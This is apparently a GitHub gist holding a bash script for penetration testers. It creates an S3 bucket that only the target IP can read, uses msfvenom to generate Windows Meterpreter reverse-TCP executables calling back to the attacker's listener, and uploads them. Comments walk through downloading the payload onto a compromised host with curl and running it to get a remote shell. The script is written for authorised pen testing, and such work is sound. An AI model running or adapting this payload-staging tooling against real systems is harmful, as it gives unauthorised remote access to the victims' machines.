@tonykarre, last active February 26, 2022
Dynamically create S3 buckets to stage pen test tools/payloads. Files can only be downloaded by the target.
#!/bin/bash
# Tony Karre
# @tonykarre
#
# payloads-to-s3.sh
#
# Use case:
#
# You are executing a pen test, and you want to temporarily stage payloads and other tools
# on a server outside of your own infrastructure. You also want to make sure that
# those files can only be seen/downloaded from the target IP. When you are finished,
# you want to delete the staging server and its contents. We'll use S3 buckets to achieve this.
#
# Do the following:
#
# 1. Create an AWS S3 bucket with a somewhat random name. We will stage our payloads here.
# 2. Apply a bucket access policy to allow external access from our target IP. By default, nobody has access to it.
# 3. Generate one or more payloads
# 4. Move payload(s) to our new bucket
# 5. Print instructions on how to delete the bucket when we are finished using it.
#
# Prerequisites:
#
# 1. You have an AWS account.
# 2. You have used the AWS Identity and Access Management (IAM) console to create an IAM user of access type "Programmatic Access".
# 3. In the IAM console, you have attached the policy "AmazonS3FullAccess" to this user, either directly or through an IAM group.
#
# 4. In Kali, you have installed the AWS command-line interface tool:
#
# apt-get install awscli
#
# 5. In Kali, you have created an AWS profile for your new IAM user
#
# root@OS14526:~# aws configure --profile your-desired-profile-name
# AWS Access Key ID [None]: your-20-char-access-key-ID-for-your-IAM-user
# AWS Secret Access Key [None]: your-40-char-secret-access-key-for-your-IAM-user
# Default region name [None]: your-desired-region # example = us-east-1
# Default output format [None]: json
# root@OS14526:~#
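#
# You can verify that the new profile works (example command; requires network
# access to AWS) before running this script:
#
#   aws --profile your-desired-profile-name sts get-caller-identity
#
# A successful call prints the account ID and ARN of your IAM user.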
#
#
# There are two required script parameters: the RHOST and LHOST IP addresses.
#
# RHOST = the target IP, same as you would supply for a Metasploit payload. This IP will be given read access to files in the bucket.
# LHOST = your listener IP, because one of your payloads will likely try to phone home. Think Metasploit LHOST.
#
# So a typical scenario might be this:
# 1. you have an unprivileged shell on RHOST.
# 2. on RHOST, you download your payload from the bucket (https URL is generated for you by this script).
# 3. on RHOST, you run the payload (meterpreter in this POC example), which connects back to LHOST.
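#
# On RHOST, step 2 might look like this (the bucket name below is a made-up
# placeholder; the script prints the real URL for you at the end):
#
#   curl -O https://s3.amazonaws.com/pentest-<random-suffix>/meterpreter-443.exe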
#
if [ "$#" -ne 2 ]
then
  printf "\nusage: %s RHOST-ip-address LHOST-ip-address\n\n" "$0"
  printf "RHOST is the metasploit-style IP address of the target remote host that needs access to our S3 bucket.\n"
  printf "LHOST is the metasploit-style IP address of the listener for any payloads.\n"
  exit 1
fi
RHOST=$1
LHOST=$2
awsprofile="PentestAPIuser" # this is your configured profile name for your aws user (see the aws configure command described above).
bucketprefix="pentest" # this is the first part of our bucket name. Limit this to 20 chars or less.
payloadroot="/var/tmp" # this is the directory where we will generate payload files prior to moving them to S3
# Start by attempting to create an AWS S3 bucket
printf "[+] Creating S3 bucket...\n"
# Generate a name for our bucket. Rules:
#
# Bucket names must be at least 3 and no more than 63 characters long.
# Bucket names must be a series of one or more labels. Adjacent labels are separated by a single period (.).
# Bucket names can contain lowercase letters, numbers, and hyphens. Each label must start and end with a lowercase letter or a number.
# Bucket names must not be formatted as an IP address (e.g., 192.168.5.4).
# When using virtual hosted–style buckets with SSL, the SSL wildcard certificate only matches buckets that do not contain periods.
# To work around this, use HTTP or write your own certificate verification logic.
# We recommend that you do not use periods (".") in bucket names.
# Construct a bucketname that looks something like this:
# pentest-pi54jmqyrfomp8l2gvg7o6c4m7v1wkqstnyefjdg
bucketname=$bucketprefix-$(tr -dc 'a-z0-9' < /dev/urandom | fold -w 40 | head -n 1)
# Build the permissions policy string for the bucket. We want to whitelist our RHOST IP, but nobody else.
# The policy JSON will look like this:
#
# {
# "Version": "2012-10-17",
# "Id": "5cb1caa8-df2b-476e-819a-8bb23b8e1195",
# "Statement": [{
# "Sid": "IPAllow",
# "Effect": "Allow",
# "Principal": "*",
# "Action": ["s3:GetObject"],
# "Resource": "arn:aws:s3:::ourbucket/*",
# "Condition": {
# "IpAddress": {
# "aws:SourceIp": "1.2.3.4/32"
# }
# }
# }]
# }
# I've squeezed all the whitespace out to avoid policy parameter issues when we use this in the command line
policystring='{"Version":"2012-10-17","Id":"'$(uuidgen)'","Statement":[{"Sid":"IPAllow","Effect":"Allow","Principal":"*","Action":["s3:GetObject"],"Resource":"arn:aws:s3:::'$bucketname'/*","Condition":{"IpAddress":{"aws:SourceIp":"'$RHOST'/32"}}}]}'
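# Optional sanity check: if jq happens to be installed, verify that the policy
# string we just built is valid JSON before trying to apply it. (Assumption:
# jq may not be present on every install, so the check is guarded and skipped otherwise.)
if command -v jq >/dev/null 2>&1; then
  echo "$policystring" | jq -e . >/dev/null || { printf "[-] Generated policy JSON is malformed\n"; exit 1; }
fi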
# create the bucket
aws --profile $awsprofile s3 mb s3://$bucketname
if [ $? -eq 0 ]
then
printf "[+] S3 bucket created successfully\n"
else
printf "[-] Failed to create S3 bucket\n"
exit 1
fi
printf "[+] Applying S3 policy to bucket...\n"
# Assign the access policy to the bucket
aws --profile $awsprofile s3api put-bucket-policy --bucket $bucketname --policy "$policystring"
if [ $? -eq 0 ]
then
printf "[+] Policy successfully assigned to bucket\n"
else
printf "[-] WARNING ------------- Failed to assign policy to bucket!\nDownload attempts from this bucket will fail!\n"
fi
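# If the policy assignment failed, you can inspect whatever policy (if any) is
# currently attached to the bucket with this command (example; run it manually):
#
#   aws --profile $awsprofile s3api get-bucket-policy --bucket $bucketname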
printf "[+] Starting payload generation/move sequence...\n"
#-------------------------------------------------------------
#
# Start of payloads area
#
# Now let's create some example payloads and move them into the bucket.
for port in 80 443; do
msfvenom -a x86 --platform Windows -e generic/none -p windows/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$port -f exe > $payloadroot/meterpreter-$port.exe
# move the file into the bucket (an "mv" command deletes the local copy of the file after moving it)
aws --profile $awsprofile s3 mv $payloadroot/meterpreter-$port.exe s3://$bucketname
if [ $? -ne 0 ]
then
printf "\n[-] Failed to copy the file to the S3 bucket\n"
fi
done
#
# End of payloads area
#
#-------------------------------------------------------------
# Let's list the contents of the bucket
printf "\n[+] Payload generation complete. Listing contents of the bucket...\n"
aws --profile $awsprofile s3 ls s3://$bucketname
if [ $? -ne 0 ]
then
printf "\n[-] Failed to list the contents of the S3 bucket\n"
fi
printf "\n[+] Finished.\n\n"
printf "Download files from your bucket like this:\n"
printf " [curl | wget | whatever] https://s3.amazonaws.com/$bucketname/filename\n\n"
printf "You can copy other files into your bucket with this command:\n"
printf " aws --profile $awsprofile s3 cp local-path/filename s3://$bucketname\n\n"
printf "You can list the files in your bucket with this command:\n"
printf " aws --profile $awsprofile s3 ls s3://$bucketname \n\n"
printf "When you are finished with the S3 bucket, delete it (and all files) with this command:\n"
printf " aws --profile $awsprofile s3 rb s3://$bucketname --force\n\n"
printf "Lost the names of your earlier buckets? Get a list of your existing buckets with this command:\n"
printf " aws --profile $awsprofile s3api list-buckets --output text\n\n"